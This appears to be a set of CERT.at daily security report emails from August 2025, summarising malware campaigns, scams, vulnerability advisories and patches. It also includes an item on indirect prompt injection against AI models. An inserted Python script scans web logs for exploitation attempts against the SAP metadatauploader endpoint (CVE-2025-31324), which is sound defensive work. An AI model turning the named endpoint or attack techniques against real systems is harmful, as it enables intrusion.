A researcher has found serious security vulnerabilities in Intel web portals. In some cases, passwords were present client-side in the code.
---------------------------------------------
https://www.golem.de/news/in-mehreren-webportalen-reihenweise-fest-kodierte…
∗∗∗ GodRAT – New RAT targeting financial institutions ∗∗∗
---------------------------------------------
Kaspersky experts analyze GodRAT, a new Gh0st RAT-based tool attacking financial firms. It is likely a successor of the AwesomePuppet RAT connected to the Winnti group.
---------------------------------------------
https://securelist.com/godrat/117119/
∗∗∗ The State of Ransomware in Retail 2025 ∗∗∗
---------------------------------------------
361 IT and cybersecurity leaders reveal the ransomware realities for retail businesses today.
---------------------------------------------
https://news.sophos.com/en-us/2025/08/19/the-state-of-ransomware-in-retail-…
∗∗∗ 493 Cases of Sextortion Against Children Linked to Notorious Scam Compounds ∗∗∗
---------------------------------------------
Scam compounds in Cambodia, Myanmar, and Laos have conned people out of billions. New research shows they may be linked to child sextortion crimes too.
---------------------------------------------
https://www.wired.com/story/child-sextorition-scam-compounds-southeast-asia/
∗∗∗ Morocco drags German newspapers before the BGH over spyware reports ∗∗∗
---------------------------------------------
Morocco is suspected of having used the Pegasus spyware against lawyers, journalists and politicians. German media reported on it; Morocco is angry.
---------------------------------------------
https://www.heise.de/news/Marokko-zieht-gegen-deutsche-Spyware-Berichtersta…
∗∗∗ Attacks on N-able N-central under way, more than 1000 systems unpatched ∗∗∗
---------------------------------------------
More than a thousand instances of the RMM N-able N-central are still vulnerable to critical flaws, and those flaws are already being attacked.
---------------------------------------------
https://www.heise.de/news/Angriffe-auf-N-able-N-central-laufen-mehr-als-100…
∗∗∗ Get 10,000,000 Robux for free? Beware, fake offer! ∗∗∗
---------------------------------------------
The online gaming platform "Roblox" is particularly popular with children and teenagers, and is basically free. To unlock certain features and content, however, an in-game currency called "Robux" is needed, which in turn is only available for real money. Criminals therefore try to lure users into a trap with the promise of free "Robux".
---------------------------------------------
https://www.watchlist-internet.at/news/robux-fake-angebot/
∗∗∗ Fashionable Phishing Bait: GenAI on the Hook ∗∗∗
---------------------------------------------
GenAI-created phishing campaigns misuse tools ranging from website builders to text generators in order to create more convincing and scalable attacks.
---------------------------------------------
https://unit42.paloaltonetworks.com/genai-phishing-bait/
∗∗∗ Ransomware gang masking PipeMagic backdoor as ChatGPT desktop app: Microsoft ∗∗∗
---------------------------------------------
Hackers are disguising a powerful strain of malware as a ChatGPT desktop application in preparation for ransomware attacks, Microsoft said.
---------------------------------------------
https://therecord.media/ransomware-gang-masking-pipemagic-backdoor
∗∗∗ UK ‘agrees to drop’ demand over Apple iCloud encryption, US intelligence head claims ∗∗∗
---------------------------------------------
The United Kingdom is backing down from a controversial legal demand targeting Apple, U.S. Director of National Intelligence Tulsi Gabbard claimed on social media.
---------------------------------------------
https://therecord.media/uk-agrees-drop-apple-encryption
∗∗∗ Trend Micro Unmasks Global "Task Scam" Industry ∗∗∗
---------------------------------------------
Trend Micro today released new research revealing the mechanics and scale of a rapidly growing fraud model known as "task scams": sophisticated online job scams that lure victims into repetitive digital tasks and systematically strip them of funds through escalating deposit demands.
---------------------------------------------
https://newsroom.trendmicro.com/2025-08-19-Trend-Micro-Unmasks-Global-Task-…
∗∗∗ Fake Copyright Notices Drop New Noodlophile Stealer Variant ∗∗∗
---------------------------------------------
Morphisec warns of a new Noodlophile Stealer variant spread via fake copyright phishing emails, using Dropbox links ..
---------------------------------------------
https://hackread.com/phishing-scam-fake-copyright-notice-noodlophile-steale…
∗∗∗ How Indirect Prompt Injections Exploit Context, Format, and Salience ∗∗∗
---------------------------------------------
A breakdown of indirect prompt injection attacks using real-world cases (emails, code comments, diagrams). Introduces the CFS model (Context, Format, Salience) to explain what makes some payloads more likely to succeed.
---------------------------------------------
https://www.fogel.dev/prompt_injection_cfs_framework
∗∗∗ Trivial C# Random Exploitation ∗∗∗
---------------------------------------------
Exploiting random number generators requires math, right? Thanks to C#’s Random, that is not necessarily the case! I ran into an HTTP 2.0 web service issuing password reset tokens from a custom encoding of (new Random()).Next(min, max) output. This led to a critical account takeover. Exploitation did not require scripting, math or libraries. Just several clicks in Burp. While I ..
---------------------------------------------
https://blog.doyensec.com/2025/08/19/trivial-exploit-on-C-random.html
=====================
= Vulnerabilities =
=====================
∗∗∗ Security Vulnerabilities fixed in Firefox 142 ∗∗∗
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/mfsa2025-64/
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 14-08-2025 18:00 − Monday 18-08-2025 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Patch now! Attacks on Fortinet IT security solutions may be imminent ∗∗∗
---------------------------------------------
The Fortinet developers closed both vulnerabilities (FortiSIEM CVE-2025-25256 "critical", FortiWeb CVE-2025-52970 "high") on the last patch day. Shortly afterwards they warned that exploit code for the FortiSIEM flaw is in circulation.
---------------------------------------------
https://www.heise.de/news/Jetzt-patchen-Attacken-auf-Fortinet-IT-Sicherheit…
∗∗∗ Should Security Solutions Be Secure? Maybe We're All Wrong - Fortinet FortiSIEM Pre-Auth Command Injection (CVE-2025-25256) ∗∗∗
---------------------------------------------
Today we’re looking at CVE-2025-25256 - a pre-authentication command injection in FortiSIEM that lets an attacker compromise an organization’s SIEM (!!!). [..] It’s the kind of “one platform to rule your SOC” solution that we believe (suspect, hope, imagine, guess, pray) might feel impressively safety-first. Except, obviously, this time it didn't because the bar remains so incredibly low.
---------------------------------------------
https://labs.watchtowr.com/should-security-solutions-be-secure-maybe-were-a…
∗∗∗ Fake prize draw for a Wiener Linien annual pass in circulation ∗∗∗
---------------------------------------------
Fake postings are currently circulating on Facebook that advertise a prize draw for a half-year pass in the name of Wiener Linien. On participating, users are led to believe they have automatically won. Warning: this is a fraud attempt aimed at obtaining bank details!
---------------------------------------------
https://www.watchlist-internet.at/news/gefaelschtes-gewinnspiel-fuer-wiener…
∗∗∗ Improvement of only 1.7 percent: phishing training almost always ineffective ∗∗∗
---------------------------------------------
A large study at a US healthcare company shows that common phishing trainings barely reduce risk, no matter how intensive or interactive they are.
---------------------------------------------
https://www.heise.de/news/Verbesserung-von-nur-1-7-Prozent-Phishing-Trainin…
∗∗∗ MadeYouReset: new DDoS attack technique takes down web servers ∗∗∗
---------------------------------------------
Researchers have discovered a new security vulnerability affecting many common HTTP/2 implementations. Servers can be overloaded with little effort. [..] Several widely used HTTP/2 server implementations such as Netty, Apache Tomcat, H2O, SwiftNIO and F5 BIG-IP are considered vulnerable. Further affected implementations and any vendor responses can be found in an advisory from the CERT Coordination Center at Carnegie Mellon University.
---------------------------------------------
https://www.golem.de/news/madeyoureset-neue-ddos-angriffstechnik-legt-webse…
∗∗∗ Evolution of the PipeMagic backdoor: from the RansomExx incident to CVE-2025-29824 ∗∗∗
---------------------------------------------
We examine the evolution of the PipeMagic backdoor and the TTPs of its operators – from the RansomExx incident in 2022 to attacks in Brazil and Saudi Arabia, and the exploitation of CVE-2025-29824 in 2025.
---------------------------------------------
https://securelist.com/pipemagic/117270/
∗∗∗ How Researchers Collect Indicators of Compromise ∗∗∗
---------------------------------------------
Today, we'll demonstrate a simple workflow showing how researchers use various tools to collect indicators of compromise (IOCs) and develop appropriate signatures from detonated malware.
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/how-researc…
∗∗∗ ERMAC V3.0 Banking Trojan Source Code Leak Exposes Full Malware Infrastructure ∗∗∗
---------------------------------------------
"The newly uncovered version 3.0 reveals a significant evolution of the malware, expanding its form injection and data theft capabilities to target more than 700 banking, shopping, and cryptocurrency applications," Hunt.io said in a report.
---------------------------------------------
https://thehackernews.com/2025/08/ermac-v30-banking-trojan-source-code.html
∗∗∗ Mobile Phishers Target Brokerage Accounts in ‘Ramp and Dump’ Cashout Scheme ∗∗∗
---------------------------------------------
Cybercriminal groups peddling sophisticated phishing kits that convert stolen card data into mobile wallets have recently shifted their focus to targeting customers of brokerage services, new research shows. Undeterred by security controls at these trading platforms that block users from wiring funds directly out of accounts, the phishers have pivoted to using multiple compromised brokerage accounts in unison to manipulate the prices of foreign stocks.
---------------------------------------------
https://krebsonsecurity.com/2025/08/mobile-phishers-target-brokerage-accoun…
∗∗∗ Scammers turn to ‘ghost-tapping’ retail fraud to launder funds ∗∗∗
---------------------------------------------
In a report released Thursday, researchers at Recorded Future’s Insikt Group detailed what they call “ghost-tapping” — when stolen payment card details are uploaded onto a burner phone and used in-person to purchase goods.
---------------------------------------------
https://therecord.media/scammers-ghost-tapping-retail-fraud-launder-cash
∗∗∗ Cyberattack on Dutch prosecution service is keeping speed cameras offline ∗∗∗
---------------------------------------------
Who knew zero-days could be so useful to highway speedsters? The lingering effects of a cyberattack on the Public Prosecution Service of the Netherlands are preventing it from reactivating speed cameras across the country.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2025/08/15/cyberattack_…
∗∗∗ AI-assisted cyberattacks: experts observe increasing LLM use ∗∗∗
---------------------------------------------
Security researchers currently see an increase in AI-assisted attacks and thus a turning point in the cyber arms race. [..] Ukrainian authorities and several cybersecurity companies first detected the malware in July. [..] With the growing use of AI agents, experts see a new risk for the future.
---------------------------------------------
https://www.heise.de/news/KI-gestuetzte-Cyberangriffe-Experten-beobachten-z…
∗∗∗ Terraform Cloud token abuse turns speculative plan into remote code execution ∗∗∗
---------------------------------------------
Platforms like Terraform are great for making cloud management easier, but that same convenience can work in an attacker’s favour. Increasingly, we’re seeing Terraform used as a pivot point, letting attackers sidestep the usual security roadblocks of MFA and conditional access via token abuse, which remain one of the weaker links in the chain.
---------------------------------------------
https://www.pentestpartners.com/security-blog/terraform-token-abuse-specula…
∗∗∗ libxml2 Maintainer Ends Embargoed Vulnerability Reports, Citing Unsustainable Burden ∗∗∗
---------------------------------------------
The lone volunteer maintainer of libxml2, one of the open source ecosystem’s most widely used XML parsing libraries, has announced a policy shift that drops support for embargoed security vulnerability reports. This change highlights growing frustration among unpaid maintainers bearing the brunt of big tech’s security demands without compensation or support.
---------------------------------------------
https://socket.dev/blog/libxml2-maintainer-ends-embargoed-vulnerability-rep…
∗∗∗ Technical Analysis of SAP Exploit Script (Visual Composer “Metadata Uploader” Exploit)… ∗∗∗
---------------------------------------------
This script targets a critical zero-day vulnerability (now identified as CVE-2025–31324) in SAP NetWeaver’s Visual Composer Metadata Uploader component. The vulnerability is a missing authorization check on the HTTP endpoint /developmentserver/metadatauploader, allowing unauthenticated file uploads to the server’s filesystem. [..] The blog contains further pseudo code for detection and examples for another way to exploit the vulnerability.
---------------------------------------------
https://detect.fyi/technical-analysis-of-sap-exploit-script-visual-composer…
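The endpoint named above gives a defender a concrete string to hunt for in reverse-proxy or ICM access logs. The following Python is an added example written for this report, not code from the detect.fyi post or from SAP. It parses a handful of constructed combined-format log lines (the IPs, timestamps and user agents are made up) and flags any request whose path, after URL-decoding and case-folding, is /developmentserver/metadatauploader. POST requests are reported as upload attempts, everything else as probing; a rejected request (401/403) is still reported, because a failed attempt is the signal that someone is testing for the bug. The case-folding and trailing-slash stripping are detection choices so that obfuscated variants are not missed, not a statement about how the servlet routes.

```python
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

# Endpoint named in the advisory text above (missing authorization check).
TARGET_PATH = "/developmentserver/metadatauploader"

# NCSA combined log format, as written by Apache httpd / nginx front ends.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (not real traffic): a probe, a POST, a benign hit,
# and a POST using a case/slash variant that the server rejected with 401.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Apr/2025:10:01:12 +0000] "GET /developmentserver/metadatauploader HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.7 - - [24/Apr/2025:10:01:13 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 200 87 "-" "python-requests/2.31"
198.51.100.4 - - [24/Apr/2025:10:02:40 +0000] "GET /irj/portal HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Apr/2025:10:03:05 +0000] "POST /DevelopmentServer/Metadatauploader/ HTTP/1.1" 401 0 "-" "curl/8.0"
"""


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def normalize_path(target):
    """URL-decode the request path, drop query string and trailing slashes, case-fold."""
    path = unquote(urlsplit(target).path)
    return path.rstrip("/").lower() or "/"


def classify(entry):
    """'upload_attempt' for a POST to the uploader, 'probe' for any other method, else None."""
    if normalize_path(entry["target"]) != TARGET_PATH:
        return None
    return "upload_attempt" if entry["method"] == "POST" else "probe"


def scan_log(text):
    """Run the classifier over every parseable line; lines that do not parse are skipped."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        entry = parse_line(line)
        if entry is None:
            continue
        verdict = classify(entry)
        if verdict is not None:
            findings.append({
                "line": lineno,
                "ip": entry["ip"],
                "ts": entry["ts"],
                "method": entry["method"],
                "status": int(entry["status"]),
                "verdict": verdict,
            })
    return findings


def summarize(findings):
    """Count findings per (source IP, verdict) so the noisiest source is triaged first."""
    return dict(Counter((f["ip"], f["verdict"]) for f in findings))


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"line {h['line']}: {h['ip']} {h['method']} -> {h['status']} [{h['verdict']}]")
    print(summarize(hits))
```

A hit on this path from any source that is not a known development workstation is worth an investigation regardless of the response code; the source post's own detection pseudo code and the upload-side artefacts it describes are the place to continue from.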
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (kernel and webkit2gtk3), Debian (aide and postgresql-13), Fedora (libtiff, mupdf, and pandoc), SUSE (cairo, chromium, gstreamer-plugins-base, ImageMagick, iputils, kubernetes1.23, kubernetes1.26, matrix-synapse, Mesa, pgadmin4, python3, qemu, and rz-pm), and Ubuntu (aide).
---------------------------------------------
https://lwn.net/Articles/1033901/
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (go-toolset:rhel8, kernel, and kernel-rt), Fedora (chromium), Oracle (libxml2), Red Hat (go-toolset:rhel8, golang, kernel, kernel-rt, openjpeg2, rsync, and tigervnc), and SUSE (apache-commons-lang3, chromedriver, fractal, framework_tool, go1.23-openssl, go1.24-openssl, grub2, gstreamer-devtools, gstreamer-plugins-rs, jasper, libavif, lighttpd, nginx, podman, postgresql13, postgresql14, postgresql15, postgresql16, python311-pypdf, ruby2.5, rust-keylime, tiff, tomcat, tomcat10, and tomcat11).
---------------------------------------------
https://lwn.net/Articles/1034267/
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 13-08-2025 18:00 − Thursday 14-08-2025 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Spike in Fortinet VPN brute-force attacks raises zero-day concerns ∗∗∗
---------------------------------------------
A massive spike in brute-force attacks targeted Fortinet SSL VPNs earlier this month, followed by a switch to FortiManager, marked a deliberate shift in targeting that has historically preceded new vulnerability disclosures.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/spike-in-fortinet-vpn-brute-…
∗∗∗ New downgrade attack can bypass FIDO auth in Microsoft Entra ID ∗∗∗
---------------------------------------------
Security researchers have created a new FIDO downgrade attack against Microsoft Entra ID that tricks users into authenticating with weaker login methods, making them susceptible to phishing and session hijacking.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-downgrade-attack-can-byp…
∗∗∗ When Hackers Call: Social Engineering, Abusing Brave Support, and EncryptHub’s Expanding Arsenal ∗∗∗
---------------------------------------------
Trustwave SpiderLabs researchers have recently identified an EncryptHub campaign that combines social engineering with abuse of the Brave Support platform to deliver malicious payloads via the CVE-2025-26633 vulnerability. In this blog post, we will break down the techniques used in the campaign and highlight the new tools employed by the threat group.
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/when-hacker…
∗∗∗ A Mega Malware Analysis Tutorial Featuring Donut-Generated Shellcode ∗∗∗
---------------------------------------------
The motivation behind writing this post is that we want to provide the kind of resource that we would've liked to have seen more of when starting our own careers in malware research.
---------------------------------------------
https://github.com/PaloAltoNetworks/Unit42-Threat-Intelligence-Article-Info…
∗∗∗ Crypto24 Ransomware Group Blends Legitimate Tools with Custom Malware for Stealth Attacks ∗∗∗
---------------------------------------------
Crypto24 is a ransomware group that stealthily blends legitimate tools with custom malware, using advanced evasion techniques to bypass security and EDR technologies.
---------------------------------------------
https://www.trendmicro.com/en_us/research/25/h/crypto24-ransomware-stealth-…
=====================
= Vulnerabilities =
=====================
∗∗∗ N-central 2025.3.1 ∗∗∗
---------------------------------------------
This release includes a critical security fix for CVE-2025-8875 and CVE-2025-8876. These vulnerabilities require authentication to exploit.
---------------------------------------------
https://status.n-able.com/2025/08/13/announcing-the-ga-of-n-central-2025-3-…
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (kernel, python3.11-setuptools, thunderbird, and toolbox), Debian (chromium), Fedora (open62541 and perl-Authen-SASL), Oracle (git, kernel, konsole, and webkit2gtk3), SUSE (framework-inputmodule-control and poppler), and Ubuntu (apache2, mysql-8.0, mysql-8.4, node-qs, request-tracker5, and ruby-sidekiq).
---------------------------------------------
https://lwn.net/Articles/1033737/
∗∗∗ Rockwell Automation Security Advisories 14.08.2025 ∗∗∗
---------------------------------------------
Rockwell Automation has released 6 new security advisories (3x Critical, 3x High)
---------------------------------------------
https://www.rockwellautomation.com/en-us/trust-center/security-advisories.h…
∗∗∗ Security patches: attackers can plant malicious code on GitLab servers ∗∗∗
---------------------------------------------
The GitLab developers have closed a total of twelve security vulnerabilities. Attackers can compromise systems. [..] In an advisory, the maintainers assure that GitLab.com is already secured. They recommend that admins of on-premise instances promptly install the fixed releases 18.0.6, 18.1.4 or 18.2.2. There is no information yet on whether attacks are already underway.
---------------------------------------------
https://heise.de/-10523017
∗∗∗ Nvidia patches security vulnerabilities in AI software ∗∗∗
---------------------------------------------
The developers have found security vulnerabilities in various Nvidia AI software. Some of them pose a high risk. [..] Affected are the Nvidia projects Apex, Isaac-GR00T, Megatron LM, Merlin Transformers4Rec, NeMo Framework and WebDataset.
---------------------------------------------
https://heise.de/-10524310
∗∗∗ Foxit PDF Reader: crafted PDFs can smuggle malicious code onto PCs ∗∗∗
---------------------------------------------
Security updates for Foxit PDF Reader and Editor close several security vulnerabilities. [..] In the worst case, malicious code can reach systems and fully compromise them. This can happen, for example, via PDFs prepared with JavaScript (e.g. CVE-2025-55313, "high"). However, it must be assumed that victims have to cooperate and open such a file for an attack to be initiated.
---------------------------------------------
https://heise.de/-10524778
∗∗∗ Drupal: Layout Builder Advanced Permissions - Moderately critical - Access bypass - SA-CONTRIB-2025-097 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2025-097
∗∗∗ Drupal: Authenticator Login - Highly critical - Access bypass - SA-CONTRIB-2025-096 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2025-096
∗∗∗ ABB: 2025-08-12: Cyber Security Advisory - ABB Ability™ zenon Remote Transport Vulnerability ∗∗∗
---------------------------------------------
https://search.abb.com/library/Download.aspx?DocumentID=2NGA002743&Language…
∗∗∗ ABB: 2025-08-11: Cyber Security Advisory -ELSB/BLBA ASPECT advisory several CVEs ∗∗∗
---------------------------------------------
https://search.abb.com/library/Download.aspx?DocumentID=9AKK108471A4462&Lan…
∗∗∗ TYPO3-PSA-2025-001: Sanitization bypass in SVG Sanitizer ∗∗∗
---------------------------------------------
https://typo3.org/security/advisory/typo3-psa-2025-001
∗∗∗ Siemens: SSA-395458 V1.0: Account Hijacking Vulnerability in Mendix SAML Module ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/html/ssa-395458.html
∗∗∗ Wordfence Intelligence Weekly WordPress Vulnerability Report (August 4, 2025 to August 10, 2025) ∗∗∗
---------------------------------------------
https://www.wordfence.com/blog/2025/08/wordfence-intelligence-weekly-wordpr…
∗∗∗ Bosch: Vulnerabilities in ctrlX OS - Setup ∗∗∗
---------------------------------------------
https://psirt.bosch.com/security-advisories/bosch-sa-129652.html
∗∗∗ Bosch: Denial of Service on Rexroth Fieldbus Couplers ∗∗∗
---------------------------------------------
https://psirt.bosch.com/security-advisories/bosch-sa-757244.html
∗∗∗ Kubernetes: CVE-2025-5187 ∗∗∗
---------------------------------------------
https://github.com/kubernetes/kubernetes/issues/133471
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 12-08-2025 18:00 − Wednesday 13-08-2025 18:00
Handler: Michael Schlagenhaufer
Co-Handler: Felician Fuchs
=====================
= News =
=====================
∗∗∗ Docker Hub still hosts dozens of Linux images with the XZ backdoor ∗∗∗
---------------------------------------------
The XZ-Utils backdoor, first discovered in March 2024, is still present in at least 35 Linux images on Docker Hub, potentially putting users, organizations, and their data at risk.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/docker-hub-still-hosts-dozen…
∗∗∗ New trends in phishing and scams: how AI and social media are changing the game ∗∗∗
---------------------------------------------
Common tactics in phishing and scams in 2025: learn about the use of AI and deepfakes, phishing via Telegram, Google Translate and Blob URLs, biometric data theft, and more.
---------------------------------------------
https://securelist.com/new-phishing-and-scam-trends-in-2025/117217/
∗∗∗ Money back after crypto fraud? Beware of recovery scams! ∗∗∗
---------------------------------------------
What worked once can work again. Criminals count on this and contact people they have harmed in the past through crypto or investment fraud. They pose as an agency, authority etc. that can help recover the lost money.
---------------------------------------------
https://www.watchlist-internet.at/news/vorsicht-vor-recovery-scam/
∗∗∗ The MedusaLocker ransomware gang is hiring penetration testers ∗∗∗
---------------------------------------------
MedusaLocker, the ransomware-as-a-service group that has been active since 2019, is openly recruiting penetration testers to help it compromise more businesses.
---------------------------------------------
https://www.fortra.com/blog/medusalocker-ransomware-gang-hiring-penetration…
∗∗∗ Malvertising campaign leads to PS1Bot, a multi-stage malware framework ∗∗∗
---------------------------------------------
Cisco Talos has observed an ongoing malware campaign that seeks to infect victims with a multi-stage malware framework, implemented in PowerShell and C#, which we are referring to as “PS1Bot.”
---------------------------------------------
https://blog.talosintelligence.com/ps1bot-malvertising-campaign/
∗∗∗ Microsoft Patch Tuesday August 2025: security assessments from Tenable ∗∗∗
---------------------------------------------
On 12 August 2025, Microsoft published security updates for its still-supported products as part of Patch Tuesday and closed vulnerabilities. [..] I now have an assessment from Tenable regarding the impact of the vulnerabilities, which I am simply posting here on the blog for information.
---------------------------------------------
https://www.borncity.com/blog/2025/08/13/microsoft-patchday-august-2025-sic…
=====================
= Vulnerabilities =
=====================
∗∗∗ Exchange Server security updates August 2025 ∗∗∗
---------------------------------------------
On 12 August 2025, Microsoft released the "August 2025" security update for Exchange Server. The security update applies to Exchange Server 2016, Exchange Server 2019 and, for the first time, Exchange Server Subscription Edition (SE).
---------------------------------------------
https://www.borncity.com/blog/2025/08/12/exchange-server-sicherheitsupdates…
∗∗∗ Microsoft Security Update Summary (12 August 2025) ∗∗∗
---------------------------------------------
On 12 August 2025, Microsoft published security updates for Windows clients and servers, for Office, and for other products. The security updates fix 107 vulnerabilities (CVEs), one of which was classified as a 0-day and was publicly known.
---------------------------------------------
https://www.borncity.com/blog/2025/08/12/microsoft-security-update-summary-…
∗∗∗ Attack via websites: critical graphics vulnerabilities endanger Windows users ∗∗∗
---------------------------------------------
While CVE-2025-50165 only concerns Windows 11 24H2 and Windows Server 2025, the number of vulnerable systems is significantly higher in the case of CVE-2025-53766. [..] Both can accordingly be exploited over the network and require no prior authentication or user interaction. According to Microsoft, the attack complexity is low in each case.
---------------------------------------------
https://www.golem.de/news/angriff-ueber-websites-kritische-grafik-schwachst…
∗∗∗ AMD and Intel patch numerous security vulnerabilities ∗∗∗
---------------------------------------------
In August, AMD and Intel released updates that close numerous security vulnerabilities in VGA and network drivers and in processors.
---------------------------------------------
https://heise.de/-10520732
∗∗∗ Patch Tuesday: several Fortinet products are vulnerable ∗∗∗
---------------------------------------------
According to an advisory, the most dangerous is a "critical" vulnerability (CVE-2025-25256) in the IT security solution FortiSIEM. There, attackers can use crafted CLI requests without authentication to execute malicious code. [..] As a security researcher writes in a post, attackers can bypass the authentication of FortiWeb firewalls.
---------------------------------------------
https://heise.de/-10519770
∗∗∗ Zoom: Windows clients enable attacks from the network ∗∗∗
---------------------------------------------
Zoom reports two security vulnerabilities in its Windows clients. They allow attackers from the network to escalate their privileges without prior login. [..] However, Zoom gives no details on what attacks might look like.
---------------------------------------------
https://heise.de/-10520206
∗∗∗ Adobe Patch Tuesday Fixes Over 60 Vulnerabilities Across 13 Products ∗∗∗
---------------------------------------------
Adobe has issued a new set of security patches addressing more than 60 vulnerabilities across 13 of its widely used software products. This update, part of the company’s routine Adobe Patch Tuesday cycle, includes critical fixes for applications ranging from Adobe Commerce and Illustrator to its Substance 3D suite.
---------------------------------------------
https://thecyberexpress.com/adobe-security-update-2/
∗∗∗ VU#767506: HTTP/2 implementations are vulnerable to "MadeYouReset" DoS attack through HTTP/2 control frames ∗∗∗
---------------------------------------------
Overview: A vulnerability has been discovered within many HTTP/2 implementations allowing for denial of service (DoS) attacks through HTTP/2 control frames. This vulnerability is colloquially known as "MadeYouReset" and is tracked as CVE-2025-8671. [..] Various vendors have provided patches and statements to address the vulnerability. Please review their statements below.
---------------------------------------------
https://kb.cert.org/vuls/id/767506
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (apache2, kernel, linux-6.1, openjdk-17, and pgpool2), Fedora (glib2, matrix-synapse, openjpeg, python3-docs, and python3.13), Oracle (gdk-pixbuf2, glibc, java-1.8.0-openjdk, kernel, libxml2, python-requests, python3.11-setuptools, and thunderbird), SUSE (amber-cli, apache-commons-lang3, eclipse-jgit, go1.23, go1.24, govulncheck-vulndb, grub2, icinga2, kubernetes1.23, libgcrypt, python3, python313, sccache, slurm, tiff, and webkit2gtk3), and Ubuntu (linux-oracle).
---------------------------------------------
https://lwn.net/Articles/1033588/
∗∗∗ Palo Alto Networks Security Advisories 2025-08-13 ∗∗∗
---------------------------------------------
https://security.paloaltonetworks.com/
∗∗∗ f5: K000152635: Quarterly Security Notification (August 2025) ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000152635
∗∗∗ Johnson Controls iSTAR Ultra, iSTAR Ultra SE, iSTAR Ultra G2, iSTAR Ultra G2 SE, iSTAR Edge G2 ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-224-02
∗∗∗ Santesoft Sante PACS Server ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-224-01
∗∗∗ AVEVA PI Integrator ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-224-04
∗∗∗ Ashlar-Vellum Cobalt, Xenon, Argon, Lithium, Cobalt Share ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-224-01
∗∗∗ Schneider Electric EcoStruxure Power Monitoring Expert ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-224-03
=====================
= End-of-Day report =
=====================
Timeframe: Monday 11-08-2025 18:00 − Tuesday 12-08-2025 18:00
Handler: Michael Schlagenhaufer
Co-Handler: Felician Fuchs
=====================
= News =
=====================
∗∗∗ Netherlands: Citrix Netscaler flaw CVE-2025-6543 exploited to breach orgs ∗∗∗
---------------------------------------------
The Netherlands National Cyber Security Centre (NCSC) is warning that a critical Citrix NetScaler vulnerability tracked as CVE-2025-6543 was exploited to breach "critical organizations" in the country.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/netherlands-citrix-netscaler…
∗∗∗ Over 3,000 NetScaler devices left unpatched against CitrixBleed 2 bug ∗∗∗
---------------------------------------------
Over 3,300 Citrix NetScaler devices remain unpatched against a critical vulnerability that allows attackers to bypass authentication by hijacking user sessions, nearly two months after patches were released.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/over-3-000-netscaler-devices…
∗∗∗ Scam hunter scammed by tax office impersonators ∗∗∗
---------------------------------------------
Scam hunter Julie-Anne Kearns, who helps scam victims online, opened up about a tax scam she fell for herself.
---------------------------------------------
https://www.malwarebytes.com/blog/news/2025/08/scam-hunter-scammed-by-tax-o…
∗∗∗ Russian-Linked Curly COMrades Deploy MucorAgent Malware in Europe ∗∗∗
---------------------------------------------
A new report from Bitdefender reveals the Russian-linked hacking group Curly COMrades is targeting Eastern Europe with a new backdoor called MucorAgent. Learn how they’re using advanced tactics to steal data.
---------------------------------------------
https://hackread.com/russian-curly-comrades-mucoragent-malware-europe/
=====================
= Vulnerabilities =
=====================
∗∗∗ Security Advisory Ivanti Connect Secure, Policy Secure & ZTA Gateways (Multiple CVEs) ∗∗∗
---------------------------------------------
Ivanti has released updates for Ivanti Connect Secure which addresses medium, high, and critical vulnerabilities. At the time of disclosure, there have been no reports of customers being exploited by this vulnerability.
---------------------------------------------
https://forums.ivanti.com/s/article/August-Security-Advisory-Ivanti-Connect…
∗∗∗ August Security Advisory Ivanti Virtual Application Delivery Controller (vADC previously vTM) (CVE-2025-8310) ∗∗∗
---------------------------------------------
Ivanti has released updates for Ivanti Virtual Application Delivery Controller (vADC), previously Virtual Traffic Manager (vTM), which addresses one medium severity vulnerability. Successful exploitation could lead to account takeover. At the time of disclosure, there have been no reports of customers being exploited by this vulnerability.
---------------------------------------------
